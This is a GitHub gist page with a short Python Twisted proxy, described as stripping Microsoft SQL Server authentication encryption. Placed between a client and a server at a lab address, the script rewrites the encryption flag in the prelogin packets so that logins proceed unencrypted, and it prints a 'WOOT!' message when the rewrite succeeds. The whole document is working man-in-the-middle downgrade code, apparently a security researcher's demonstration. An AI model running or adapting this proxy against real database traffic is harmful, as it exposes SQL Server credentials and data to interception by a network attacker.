Create a gist now

Instantly share code, notes, and snippets.

@thinkst /mssql-proxy.py Secret
Created Oct 29, 2015

What would you like to do?
Proxy that strips Microsoft SQL Server authentication encryption
#!/usr/bin/env python
LISTEN_PORT = 1433
SERVER_PORT = 1433
SERVER_ADDR = "172.16.172.142"
from twisted.internet import protocol, reactor
# Adapted from http://stackoverflow.com/a/15645169/221061
class ServerProtocol(protocol.Protocol):
def __init__(self):
self.buffer = None
self.client = None
def connectionMade(self):
factory = protocol.ClientFactory()
factory.protocol = ClientProtocol
factory.server = self
reactor.connectTCP(SERVER_ADDR, SERVER_PORT, factory)
# Client => Proxy
def dataReceived(self, data):
old_prelogin = "\x00\x00\x1f\x00\x06\x01\x00%\x00\x01\x02\x00&\x00\x01\x03\x00'\x00\x04\x04\x00+\x00\x01\x05\x00,\x00$\xff\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00M\xa5*\xa8\xc0\xcc\xc6L\x85\xc4\xe2\xffHMd\xcb\x87\x16/\r-|\xa8L\xa2\x8b\x91\xeaM\x98X\t\x01\x00\x00\x00"
new_prelogin = "\x00\x00\x1f\x00\x06\x01\x00%\x00\x01\x02\x00&\x00\x01\x03\x00'\x00\x04\x04\x00+\x00\x01\x05\x00,\x00$\xff\x10\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\xb8\x00M\xa5*\xa8\xc0\xcc\xc6L\x85\xc4\xe2\xffHMd\xcb\x87\x16/\r-|\xa8L\xa2\x8b\x91\xeaM\x98X\t\x01\x00\x00\x00"
i = data.find("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
if i > -1:
print "FOUND: client prelogin"
rstr = "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
data = data[:i] + rstr + data[i + len(rstr):]
if self.client:
self.client.write(data)
else:
self.buffer = data
# Proxy => Client
def write(self, data):
self.transport.write(data)
class ClientProtocol(protocol.Protocol):
def connectionMade(self):
self.factory.server.client = self
self.write(self.factory.server.buffer)
self.factory.server.buffer = ''
# Server => Proxy
def dataReceived(self, data):
print "Server says:", "".join("{:02x}".format(ord(c)) for c in data)
if data.endswith("\xff\x0c\x00\x10\x04\x00\x00\x00\x00\x00"):
data = data[:-3] + "\x02\x00\x00"
print "Server says:", "".join("{:02x}".format(ord(c)) for c in data)
print "WOOT! replacement above"
self.factory.server.write(data)
# Proxy => Server
def write(self, data):
if data:
self.transport.write(data)
def main():
factory = protocol.ServerFactory()
factory.protocol = ServerProtocol
reactor.listenTCP(LISTEN_PORT, factory)
reactor.run()
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment